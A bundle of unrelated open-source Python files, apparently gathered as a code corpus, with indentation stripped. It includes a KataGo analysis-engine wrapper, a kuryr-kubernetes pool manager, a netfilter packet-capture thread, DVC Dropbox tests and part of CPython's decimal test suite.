>>> assert_type = TypeAsserter({'foo': str, 'bar': list}, if_kind_missing='raise')
>>> assert_type('not_a_kind', 'blah')
Traceback (most recent call last):
...
ValueError: Unrecognized kind: not_a_kind. The ones I recognize: ['foo', 'bar']
"""
def __init__(self, types_for_kind, if_kind_missing='ignore'):
self.types_for_kind = types_for_kind
assert if_kind_missing in {'ignore', 'raise', 'warn'}
self.if_kind_missing = if_kind_missing
def __call__(self, k, v):
types = self.types_for_kind.get(k, None)
if types is not None:
assert isinstance(
v, types
), f'Invalid {k} type, must be a {types}, but was a {type(v)}'
elif self.if_kind_missing == 'ignore':
pass
elif self.if_kind_missing == 'raise':
raise ValueError(
f'Unrecognized kind: {k}. The ones I recognize: {list(self.types_for_kind.keys())}'
)
elif self.if_kind_missing == 'warn':
from warnings import warn
warn(
f'Unrecognized kind: {k}. The ones I recognize: {list(self.types_for_kind.keys())}'
)
def path_to_obj(root_obj, attr_path):
"""Get an object from a root object and "attribute path" specification.
>>> class A:
... def foo(self, x): ...
... foo.x = 3
... class B:
... def bar(self, x): ...
...
>>> obj = path_to_obj(A, ('foo',))
>>> assert callable(obj) and obj.__name__ == 'foo'
>>> path_to_obj(A, ('foo', 'x'))
3
>>> obj = path_to_obj(A, ('B', 'bar'))
>>> assert callable(obj) and obj.__qualname__ == 'A.B.bar'
"""
obj = root_obj
for attr in attr_path:
obj = getattr(obj, attr)
return obj
# TODO: I'd like to find a better way to do this. Using globals() here.
# See https://stackoverflow.com/questions/62416006/getting-the-attribute-path-of-a-python-object
def obj_to_path(obj):
"""Quasi-inverse of obj_to_path: Get a root_obj and attr_path from an object.
Obviously, would only be able to work with some types (only by-ref types?).
>>> class A:
... def foo(self, x): ...
... foo.x = 3
... class B:
... def bar(self, x): ...
...
>>> for t in [(A, ('foo',)), (A, ('B',)), (A, ('B', 'bar'))]: # doctest: +SKIP
... print(obj_to_path(path_to_obj(*t)))
... print(t)
... print()
(<class 'util.A'>, ('foo',))
(<class 'util.A'>, ('foo',))
<BLANKLINE>
<class 'util.A.B'>
(<class 'util.A'>, ('B',))
<BLANKLINE>
(<class 'util.A'>, ('B', 'bar'))
(<class 'util.A'>, ('B', 'bar'))
<BLANKLINE>
# >>> for t in [(A, ('foo',)), (A, ('B',)), (A, ('B', 'bar'))]:
# ... assert obj_to_path(path_to_obj(*t)) == t
"""
if hasattr(obj, '__qualname__') and hasattr(obj, '__globals__'):
root_name, *attr_path = obj.__qualname__.split('.')
return obj.__globals__[root_name], tuple(attr_path)
else:
return obj
|
parallel_map.py
|
from torch import multiprocessing
from typing import Iterable, Callable, Any, List
import time
def parallel_map(tasks: Iterable, callback = Callable[[Any], None], max_parallel: int = 32) -> List:
limit = min(multiprocessing.cpu_count(), max_parallel)
processes: List[multiprocessing.Process] = []
queues: List[multiprocessing.Queue] = []
indices: List[int] = []
tlist = [t for t in tasks]
res = [None] * len(tlist)
curr = 0
def process_return(q, arg):
res = callback(arg)
q.put(res)
while curr < len(tlist):
if len(processes) == limit:
ended = []
for i, q in enumerate(queues):
if not q.empty():
processes[i].join()
ended.append(i)
res[indices[i]] = q.get()
for i in sorted(ended, reverse=True):
processes.pop(i)
queues.pop(i)
indices.pop(i)
if not ended:
time.sleep(0.1)
continue
queues.append(multiprocessing.Queue())
indices.append(curr)
processes.append(multiprocessing.Process(target=process_return, args=(queues[-1], tlist[curr])))
processes[-1].start()
curr += 1
for i, p in enumerate(processes):
res[indices[i]] = queues[i].get()
p.join()
return res
|
engine.py
|
import copy
import json
import os
import platform
import queue
import shlex
import subprocess
import sys
import threading
import time
import traceback
from typing import Callable, Dict, List, Optional
from kivy.utils import platform as kivy_platform
from katrain.core.constants import OUTPUT_DEBUG, OUTPUT_ERROR, OUTPUT_EXTRA_DEBUG, OUTPUT_KATAGO_STDERR
from katrain.core.game_node import GameNode
from katrain.core.lang import i18n
from katrain.core.sgf_parser import Move
from katrain.core.utils import find_package_resource, json_truncate_arrays
class EngineDiedException(Exception):
pass
class KataGoEngine:
"""Starts and communicates with the KataGO analysis engine"""
# TODO: we don't support suicide in game.py, so no "tt": "tromp-taylor", "nz": "new-zealand"
RULESETS_ABBR = [
("jp", "japanese"),
("cn", "chinese"),
("ko", "korean"),
("aga", "aga"),
("stone_scoring", "stone_scoring"),
]
RULESETS = {fromkey: name for abbr, name in RULESETS_ABBR for fromkey in [abbr, name]}
@staticmethod
def get_rules(node):
return KataGoEngine.RULESETS.get(str(node.ruleset).lower(), "japanese")
def __init__(self, katrain, config):
self.katrain = katrain
self.queries = {} # outstanding query id -> start time and callback
self.config = config
self.query_counter = 0
self.katago_process = None
self.base_priority = 0
self.override_settings = {"reportAnalysisWinratesAs": "BLACK"} # force these settings
self.analysis_thread = None
self.stderr_thread = None
self.write_stdin_thread = None
self.shell = False
self.write_queue = queue.Queue()
self.thread_lock = threading.Lock()
exe = config.get("katago", "").strip()
if config.get("altcommand", ""):
self.command = config["altcommand"]
self.shell = True
else:
if not exe:
if kivy_platform == "win":
exe = "katrain/KataGo/katago.exe"
elif kivy_platform == "linux":
exe = "katrain/KataGo/katago"
else:
exe = find_package_resource("katrain/KataGo/katago-osx") # github actions built
if not os.path.isfile(exe) or "arm64" in platform.version().lower():
exe = "katago" # e.g. MacOS after brewing
model = find_package_resource(config["model"])
cfg = find_package_resource(config["config"])
if exe.startswith("katrain"):
exe = find_package_resource(exe)
exepath, exename = os.path.split(exe)
if exepath and not os.path.isfile(exe):
self.katrain.log(i18n._("Kata exe not found").format(exe=exe), OUTPUT_ERROR)
return # don't start
elif not exepath:
paths = os.getenv("PATH", ".").split(os.pathsep) + ["/opt/homebrew/bin/"]
exe_with_paths = [os.path.join(path, exe) for path in paths if os.path.isfile(os.path.join(path, exe))]
if not exe_with_paths:
self.katrain.log(i18n._("Kata exe not found in path").format(exe=exe), OUTPUT_ERROR)
return # don't start
exe = exe_with_paths[0]
elif not os.path.isfile(model):
self.katrain.log(i18n._("Kata model not found").format(model=model), OUTPUT_ERROR)
return # don't start
elif not os.path.isfile(cfg):
self.katrain.log(i18n._("Kata config not found").format(config=cfg), OUTPUT_ERROR)
return # don't start
self.command = shlex.split(
f'"{exe}" analysis -model "{model}" -config "{cfg}" -analysis-threads {config["threads"]}'
)
self.start()
def start(self):
with self.thread_lock:
self.write_queue = queue.Queue()
try:
self.katrain.log(f"Starting KataGo with {self.command}", OUTPUT_DEBUG)
startupinfo = None
if hasattr(subprocess, "STARTUPINFO"):
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW # stop command box popups on win/pyinstaller
self.katago_process = subprocess.Popen(
self.command,
startupinfo=startupinfo,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=self.shell,
)
except (FileNotFoundError, PermissionError, OSError) as e:
self.katrain.log(
i18n._("Starting Kata failed").format(command=self.command, error=e),
OUTPUT_ERROR,
)
return # don't start
self.analysis_thread = threading.Thread(target=self._analysis_read_thread, daemon=True)
self.stderr_thread = threading.Thread(target=self._read_stderr_thread, daemon=True)
self.write_stdin_thread = threading.Thread(target=self._write_stdin_thread, daemon=True)
self.analysis_thread.start()
self.stderr_thread.start()
self.write_stdin_thread.start()
def on_new_game(self):
self.base_priority += 1
if not self.is_idle():
with self.thread_lock:
for query_id in list(self.queries.keys()):
self.terminate_query(query_id)
self.queries = {}
self.write_queue = queue.Queue()
def restart(self):
self.queries = {}
self.shutdown(finish=False)
self.start()
def check_alive(self, os_error="", exception_if_dead=False):
ok = self.katago_process and self.katago_process.poll() is None
if not ok and exception_if_dead:
if self.katago_process:
code = self.katago_process and self.katago_process.poll()
if code == 3221225781:
died_msg = i18n._("Engine missing DLL")
else:
os_error += f"status {code}"
died_msg = i18n._("Engine died unexpectedly").format(error=os_error)
if code != 1: # deliberate exit, already showed message?
self.katrain.log(died_msg, OUTPUT_ERROR)
self.katago_process = None
else:
died_msg = i18n._("Engine died unexpectedly").format(error=os_error)
raise EngineDiedException(died_msg)
return ok
def wait_to_finish(self):
while self.queries and self.katago_process and self.katago_process.poll() is None:
time.sleep(0.1)
def shutdown(self, finish=False):
process = self.katago_process
if finish and process:
self.wait_to_finish()
if process:
self.katago_process = None
self.katrain.log("Terminating KataGo process", OUTPUT_DEBUG)
process.terminate()
self.katrain.log("Terminated KataGo process", OUTPUT_DEBUG)
if finish is not None: # don't care if exiting app
for t in [self.write_stdin_thread, self.analysis_thread, self.stderr_thread]:
if t:
t.join()
def is_idle(self):
return not self.queries and self.write_queue.empty()
def queries_remaining(self):
return len(self.queries) + int(not self.write_queue.empty())
def _read_stderr_thread(self):
while self.katago_process is not None:
try:
line = self.katago_process.stderr.readline()
if line:
try:
self.katrain.log(line.decode(errors="ignore").strip(), OUTPUT_KATAGO_STDERR)
except Exception as e:
print("ERROR in processing KataGo stderr:", line, "Exception", e)
elif self.katago_process:
self.check_alive(exception_if_dead=True)
except Exception as e:
self.katrain.log(f"Exception in reading stdout {e}", OUTPUT_DEBUG)
return
def _analysis_read_thread(self):
while self.katago_process is not None:
try:
line = self.katago_process.stdout.readline().strip()
if self.katago_process and not line:
self.check_alive(exception_if_dead=True)
except OSError as e:
self.check_alive(os_error=str(e), exception_if_dead=True)
return
if b"Uncaught exception" in line:
self.katrain.log(f"KataGo Engine Failed: {line.decode(errors='ignore')}", OUTPUT_ERROR)
return
if not line:
continue
try:
analysis = json.loads(line)
if "id" not in analysis:
self.katrain.log(f"Error without ID {analysis} received from KataGo", OUTPUT_ERROR)
continue
query_id = analysis["id"]
if query_id not in self.queries:
self.katrain.log(f"Query result {query_id} discarded -- recent new game?", OUTPUT_DEBUG)
continue
callback, error_callback, start_time, next_move = self.queries[query_id]
if "error" in analysis:
del self.queries[query_id]
if error_callback:
error_callback(analysis)
elif not (next_move and "Illegal move" in analysis["error"]): # sweep
self.katrain.log(f"{analysis} received from KataGo", OUTPUT_ERROR)
elif "warning" in analysis:
self.katrain.log(f"{analysis} received from KataGo", OUTPUT_DEBUG)
elif "terminateId" in analysis:
self.katrain.log(f"{analysis} received from KataGo", OUTPUT_DEBUG)
else:
partial_result = analysis.get("isDuringSearch", False)
if not partial_result:
del self.queries[query_id]
time_taken = time.time() - start_time
results_exist = not analysis.get("noResults", False)
self.katrain.log(
f"[{time_taken:.1f}][{query_id}][{'....' if partial_result else 'done'}] KataGo analysis received: {len(analysis.get('moveInfos',[]))} candidate moves, {analysis['rootInfo']['visits'] if results_exist else 'n/a'} visits",
OUTPUT_DEBUG,
)
self.katrain.log(json_truncate_arrays(analysis), OUTPUT_EXTRA_DEBUG)
try:
if callback and results_exist:
callback(analysis, partial_result)
except Exception as e:
self.katrain.log(f"Error in engine callback for query {query_id}: {e}", OUTPUT_ERROR)
if getattr(self.katrain, "update_state", None): # easier mocking etc
self.katrain.update_state()
except Exception as e:
self.katrain.log(f"Unexpected exception {e} while processing KataGo output {line}", OUTPUT_ERROR)
traceback.print_exc()
def _write_stdin_thread(self): # flush only in a thread since it returns only when the other program reads
while self.katago_process is not None:
try:
query, callback, error_callback, next_move = self.write_queue.get(block=True, timeout=0.1)
except queue.Empty:
continue
with self.thread_lock:
if "id" not in query:
self.query_counter += 1
query["id"] = f"QUERY:{str(self.query_counter)}"
self.queries[query["id"]] = (callback, error_callback, time.time(), next_move)
self.katrain.log(f"Sending query {query['id']}: {json.dumps(query)}", OUTPUT_DEBUG)
try:
self.katago_process.stdin.write((json.dumps(query) + "\n").encode())
self.katago_process.stdin.flush()
except OSError as e:
self.check_alive(os_error=str(e), exception_if_dead=False)
def send_query(self, query, callback, error_callback, next_move=None):
self.write_queue.put((query, callback, error_callback, next_move))
def terminate_query(self, query_id):
if query_id is not None:
self.send_query({"action": "terminate", "terminateId": query_id}, None, None)
def request_analysis(
self,
analysis_node: GameNode,
callback: Callable,
error_callback: Optional[Callable] = None,
visits: int = None,
analyze_fast: bool = False,
time_limit=True,
find_alternatives: bool = False,
region_of_interest: Optional[List] = None,
priority: int = 0,
ownership: Optional[bool] = None,
next_move: Optional[GameNode] = None,
extra_settings: Optional[Dict] = None,
report_every: Optional[float] = None,
):
nodes = analysis_node.nodes_from_root
moves = [m for node in nodes for m in node.moves]
initial_stones = [m for node in nodes for m in node.placements]
if next_move:
moves.append(next_move)
if ownership is None:
ownership = self.config["_enable_ownership"] and not next_move
if visits is None:
visits = self.config["max_visits"]
if analyze_fast and self.config.get("fast_visits"):
visits = self.config["fast_visits"]
size_x, size_y = analysis_node.board_size
if find_alternatives:
avoid = [
{
"moves": list(analysis_node.analysis["moves"].keys()),
"player": analysis_node.next_player,
"untilDepth": 1,
}
]
elif region_of_interest:
xmin, xmax, ymin, ymax = region_of_interest
avoid = [
{
"moves": [
Move((x, y)).gtp()
for x in range(0, size_x)
for y in range(0, size_y)
if x < xmin or x > xmax or y < ymin or y > ymax
],
"player": player,
"untilDepth": 1, # tried a large number here, or 2, but this seems more natural
}
for player in "BW"
]
else:
avoid = []
settings = copy.copy(self.override_settings)
if time_limit:
settings["maxTime"] = self.config["max_time"]
if self.config.get("wide_root_noise", 0.0) > 0.0: # don't send if 0.0, so older versions don't error
settings["wideRootNoise"] = self.config["wide_root_noise"]
query = {
"rules": self.get_rules(analysis_node),
"priority": self.base_priority + priority,
"analyzeTurns": [len(moves)],
"maxVisits": visits,
"komi": analysis_node.komi,
"boardXSize": size_x,
"boardYSize": size_y,
"includeOwnership": ownership and not next_move,
"includeMovesOwnership": ownership and not next_move,
"includePolicy": not next_move,
"initialStones": [[m.player, m.gtp()] for m in initial_stones],
"initialPlayer": analysis_node.initial_player,
"moves": [[m.player, m.gtp()] for m in moves],
"overrideSettings": {**settings, **(extra_settings or {})},
}
if report_every is not None:
query["reportDuringSearchEvery"] = report_every
if avoid:
query["avoidMoves"] = avoid
self.send_query(query, callback, error_callback, next_move)
analysis_node.analysis_visits_requested = max(analysis_node.analysis_visits_requested, visits)
|
_send.py
|
import threading
def send(self):
# Kivy must stay on the main thread, other wise Kivy pauses
self.check_if_all()
self.start_gif()
self.download_thread = threading.Thread(target=self.download)
self.check_thread = threading.Thread(target=self.check_if_done)
self.download_thread.start()
self.check_thread.start()
|
pool.py
|
# Copyright 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from http import server
import os
import socketserver
import threading
from openstack import exceptions as os_exc
from oslo_config import cfg as oslo_cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from kuryr.lib._i18n import _
from kuryr_kubernetes import constants
from kuryr_kubernetes.controller.drivers import base as drivers
LOG = logging.getLogger(__name__)
pool_manager_opts = [
oslo_cfg.StrOpt('sock_file',
help=_("Absolute path to socket file that "
"will be used for communication with "
"the Pool Manager daemon"),
default='/run/kuryr/kuryr_manage.sock'),
]
oslo_cfg.CONF.register_opts(pool_manager_opts, "pool_manager")
class UnixDomainHttpServer(socketserver.ThreadingUnixStreamServer):
pass
class RequestHandler(server.BaseHTTPRequestHandler):
protocol = "HTTP/1.0"
def do_POST(self):
content_length = int(self.headers.get('Content-Length', 0))
body = self.rfile.read(content_length)
params = dict(jsonutils.loads(body))
if self.path.endswith(constants.VIF_POOL_POPULATE):
trunk_ips = params.get('trunks', None)
num_ports = params.get('num_ports', 1)
if trunk_ips:
try:
self._create_subports(num_ports, trunk_ips)
except Exception:
response = ('Error while populating pool {0} with {1} '
'ports.'.format(trunk_ips, num_ports))
else:
response = ('Ports pool at {0} was populated with {1} '
'ports.'.format(trunk_ips, num_ports))
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
else:
response = 'Trunk port IP(s) missing.'
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
elif self.path.endswith(constants.VIF_POOL_FREE):
trunk_ips = params.get('trunks', None)
if not trunk_ips:
pool = "all"
else:
pool = trunk_ips
try:
self._delete_subports(trunk_ips)
except Exception:
response = 'Error freeing ports pool: {0}.'.format(pool)
else:
response = 'Ports pool belonging to {0} was freed.'.format(
pool)
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
else:
response = 'Method not allowed.'
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
def do_GET(self):
content_length = int(self.headers.get('Content-Length', 0))
body = self.rfile.read(content_length)
params = dict(jsonutils.loads(body))
if self.path.endswith(constants.VIF_POOL_LIST):
try:
pools_info = self._list_pools()
except Exception:
response = 'Error listing the pools.'
else:
response = 'Pools:\n{0}'.format(pools_info)
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
elif self.path.endswith(constants.VIF_POOL_SHOW):
raw_key = params.get('pool_key', None)
if len(raw_key) != 3:
response = ('Invalid pool key. Proper format is:\n'
'[trunk_ip, project_id, [security_groups]]\n')
else:
pool_key = (raw_key[0], raw_key[1], tuple(sorted(raw_key[2])))
try:
pool_info = self._show_pool(pool_key)
except Exception:
response = 'Error showing pool: {0}.'.format(pool_key)
else:
response = 'Pool {0} ports are:\n{1}'.format(pool_key,
pool_info)
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
else:
response = 'Method not allowed.'
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
def _create_subports(self, num_ports, trunk_ips):
try:
drv_project = drivers.PodProjectDriver.get_instance()
drv_subnets = drivers.PodSubnetsDriver.get_instance()
drv_sg = drivers.PodSecurityGroupsDriver.get_instance()
drv_vif = drivers.PodVIFDriver.get_instance()
drv_vif_pool = drivers.VIFPoolDriver.get_instance()
drv_vif_pool.set_vif_driver(drv_vif)
project_id = drv_project.get_project({})
security_groups = drv_sg.get_security_groups({}, project_id)
subnets = drv_subnets.get_subnets([], project_id)
except TypeError:
LOG.error("Invalid driver type")
raise
for trunk_ip in trunk_ips:
try:
drv_vif_pool.force_populate_pool(
trunk_ip, project_id, subnets, security_groups, num_ports)
except os_exc.ConflictException:
LOG.error("VLAN Id conflict (already in use) at trunk %s",
trunk_ip)
raise
except os_exc.SDKException:
LOG.exception("Error happened during subports addition at "
"trunk: %s", trunk_ip)
raise
def _delete_subports(self, trunk_ips):
try:
drv_vif = drivers.PodVIFDriver.get_instance()
drv_vif_pool = drivers.VIFPoolDriver.get_instance()
drv_vif_pool.set_vif_driver(drv_vif)
drv_vif_pool.free_pool(trunk_ips)
except TypeError:
LOG.error("Invalid driver type")
raise
def _list_pools(self):
try:
drv_vif = drivers.PodVIFDriver.get_instance()
drv_vif_pool = drivers.VIFPoolDriver.get_instance()
drv_vif_pool.set_vif_driver(drv_vif)
available_pools = drv_vif_pool.list_pools()
except TypeError:
LOG.error("Invalid driver type")
raise
pools_info = ""
for pool_key, pool_items in available_pools.items():
pools_info += (jsonutils.dumps(pool_key) + " has "
+ str(len(pool_items)) + " ports\n")
if pools_info:
return pools_info
return "There are no pools"
def _show_pool(self, pool_key):
try:
drv_vif = drivers.PodVIFDriver.get_instance()
drv_vif_pool = drivers.VIFPoolDriver.get_instance()
drv_vif_pool.set_vif_driver(drv_vif)
pool = drv_vif_pool.show_pool(pool_key)
except TypeError:
LOG.error("Invalid driver type")
raise
if pool:
pool_info = ""
for pool_id in pool:
pool_info += str(pool_id) + "\n"
return pool_info
else:
return "Empty pool"
class PoolManager(object):
"""Manages the ports pool enabling population and free actions.
`PoolManager` runs on the Kuryr-kubernetes controller and allows to
populate specific pools with a given amount of ports. In addition, it also
allows to remove all the (unused) ports in the given pool(s), or from all
of the pool if none of them is specified.
"""
def __init__(self):
pool_manager = threading.Thread(target=self._start_kuryr_manage_daemon)
pool_manager.setDaemon(True)
pool_manager.start()
def _start_kuryr_manage_daemon(self):
LOG.info("Pool manager started")
server_address = oslo_cfg.CONF.pool_manager.sock_file
try:
os.unlink(server_address)
except OSError:
if os.path.exists(server_address):
raise
try:
httpd = UnixDomainHttpServer(server_address, RequestHandler)
httpd.serve_forever()
except KeyboardInterrupt:
pass
except Exception:
LOG.exception('Failed to start Pool Manager.')
httpd.socket.close()
|
packet_capture.py
|
"""
Thread that continuously captures and processes packets.
"""
import scapy.all as sc
import threading
import time
from host_state import HostState
import utils
from netfilterqueue import NetfilterQueue
class PacketCapture(object):
def __init__(self, host_state):
assert isinstance(host_state, HostState)
self._host_state = host_state
self.nfqueue = NetfilterQueue()
self._lock = threading.Lock()
self._active = True
self._thread = threading.Thread(target=self._capture_packets)
self._thread.daemon = True
def start(self):
with self._lock:
self._active = True
utils.log('[Packet Capture] Starting.')
self._thread.start()
def _capture_packets(self):
while self._is_active():
if not self._host_state.is_inspecting():
time.sleep(2)
continue
# result = utils.safe_run(sc.sniff, kwargs={
# 'prn': self._host_state.packet_processor.process_packet,
# 'iface': 'wlan0',
# 'stop_filter':
# lambda _:
# not self._is_active() or
# not self._host_state.is_inspecting(),
# 'timeout': 30
# })
self.nfqueue.bind(1, self._host_state.packet_processor.process_packet)
print('run nfqueue')
result = utils.safe_run(self.nfqueue.run)
if isinstance(result, utils._SafeRunError):
time.sleep(1)
def _is_active(self):
with self._lock:
return self._active
def stop(self):
self.nfqueue.unbind()
utils.log('[Packet Capture] Stopping.')
with self._lock:
self._active = False
self._thread.join()
utils.log('[Packet Capture] Stopped.')
|
test_dropbox.py
|
import multiprocessing
import random
import string
import uuid
import pytest
from dvc.exceptions import DvcException
from dvc.path_info import PathInfo
from dvc.tree.dropbox import DropboxTree
def rand_content(nchar):
letters = string.ascii_lowercase
prefix = "".join(random.choice(letters) for _ in range(100))
return prefix + "a" * (nchar - 100)
SCENARIOS = [
# (n_files, filesize)
(100, 100 * 1024),
# 200 MB is over their limit for single-call upload
(5, 200 * 1024 * 1024),
]
IDS = [
"small_files",
"normal_files",
]
def push(dvc):
dvc.push()
class TestRemoteDropbox:
CONFIG = {
"url": "dropbox://dvc/tests-root",
"chunk_size": 48,
}
INVALID_CHUNK_SIZE_CONFIG_MULTIPLE = {
"url": "dropbox://dvc/tests-root",
"chunk_size": 47,
}
INVALID_CHUNK_SIZE_CONFIG_LESS_THAN_4 = {
"url": "dropbox://dvc/tests-root",
"chunk_size": 0,
}
INVALID_CHUNK_SIZE_CONFIG_OVER_150 = {
"url": "dropbox://dvc/tests-root",
"chunk_size": 300,
}
def test_init(self, dvc, dropbox):
tree = DropboxTree(dvc, self.CONFIG)
assert str(tree.path_info) == self.CONFIG["url"]
assert tree.chunk_size_mb == self.CONFIG["chunk_size"]
with pytest.raises(DvcException):
DropboxTree(dvc, self.INVALID_CHUNK_SIZE_CONFIG_MULTIPLE)
with pytest.raises(DvcException):
DropboxTree(dvc, self.INVALID_CHUNK_SIZE_CONFIG_LESS_THAN_4)
with pytest.raises(DvcException):
DropboxTree(dvc, self.INVALID_CHUNK_SIZE_CONFIG_OVER_150)
def test_dropbox(self, dvc, tmp_dir, dropbox):
tree = DropboxTree(dvc, dropbox.config)
tmp_dir.gen("small", "small")
to_info = tree.path_info / "small"
tree.upload(PathInfo("small"), to_info)
assert tree.exists(to_info)
hash_info = tree.get_file_hash(to_info)
assert hash_info.name == "content_hash"
hash_ = hash_info.value
assert hash_
assert isinstance(hash_, str)
assert hash_.strip("'").strip('"') == hash_
to_other_info = tree.path_info / "foo" / "bar"
tree.upload(PathInfo("small"), to_other_info)
files = list(tree.walk_files(tree.path_info))
assert len(files) == 2
assert str(tree.path_info) + "/small" in files
assert str(tree.path_info) + "/foo/bar" in files
tree.remove(to_info)
assert not tree.exists(to_info)
tmp_dir.gen("large", "large" * 1_000_000)
tree.upload(PathInfo("large"), tree.path_info / "large")
assert tree.exists(tree.path_info / "large")
tree.remove(tree.path_info)
@pytest.mark.skip(reason="For manual testing only")
@pytest.mark.parametrize("n_files, size", SCENARIOS, ids=IDS)
def test_dropbox_files_upload(self, n_files, size, dvc, tmp_dir, dropbox):
random.seed(42)
tmp_dir.dvc_gen(
{
str(uuid.uuid4()): {
"file_{0}".format(i): rand_content(size)
for i in range(n_files)
}
}
)
tmp_dir.add_remote(config=dropbox.config)
dvc.push()
tree = DropboxTree(dvc, dropbox.config)
tree.remove(tree.path_info)
@pytest.mark.skip(reason="For manual testing only")
@pytest.mark.parametrize("n_files, size", SCENARIOS, ids=IDS)
def test_dropbox_recovers_from_failure(
self, n_files, size, dvc, tmp_dir, scm, dropbox
):
random.seed(42)
tmp_dir.dvc_gen(
{
str(uuid.uuid4()): {
"file_{0}".format(i): rand_content(size)
for i in range(n_files)
}
}
)
tmp_dir.add_remote(config=dropbox.config)
p = multiprocessing.Process(target=push, args=(dvc,))
p.start()
p.join(10) # Let's say we can't upload whole content in 10 secs.
if p.is_alive():
p.terminate()
p.join()
dvc.push()
tree = DropboxTree(dvc, dropbox.config)
tree.remove(tree.path_info)
|
test_decimal.py
|
# Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings)
from test.support import (check_warnings, import_fresh_module, TestFailed,
run_with_locale, cpython_only)
import random
import time
import warnings
import inspect
try:
import threading
except ImportError:
threading = None
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
if not m: return
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
